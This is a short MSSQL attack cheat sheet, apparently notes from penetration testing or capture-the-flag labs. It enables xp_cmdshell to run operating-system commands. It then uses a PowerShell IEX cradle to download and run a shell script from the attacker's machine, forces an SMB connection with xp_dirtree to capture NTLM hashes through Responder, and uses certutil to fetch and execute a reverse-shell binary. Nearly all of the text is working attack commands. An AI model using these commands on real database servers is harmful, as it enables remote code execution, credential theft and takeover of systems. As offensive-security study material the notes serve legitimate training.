-- checks version
select @@version;
-- show databases
EXEC sp_databases;
-- checks if use has sysadmin privileges (1 means
-- sysadmin)
SELECT IS_SRVROLEMEMBER('sysadmin')
-- enables xp_cmdshell
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"
-- executes commands
xp_cmdshell "whoami"
xp_cmdshell dir
-- make victim download from our machine (10.10.14.60)
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.60/shell.ps1\");"
-- Intercept NTLM hash of user (be sure to fire up
-- responder first)
SQL> xp_dirtree '\\10.11.40.33\anything'
-- Transfer a reverse shell binary and execute it
xp_cmdshell certutil -urlcache -f http://10.11.40.33/reverse.exe c:\users\SVC-Kerb.DC01\reverse.exe
xp_cmdshell c:\users\SVC-Kerb.DC01\reverse.exe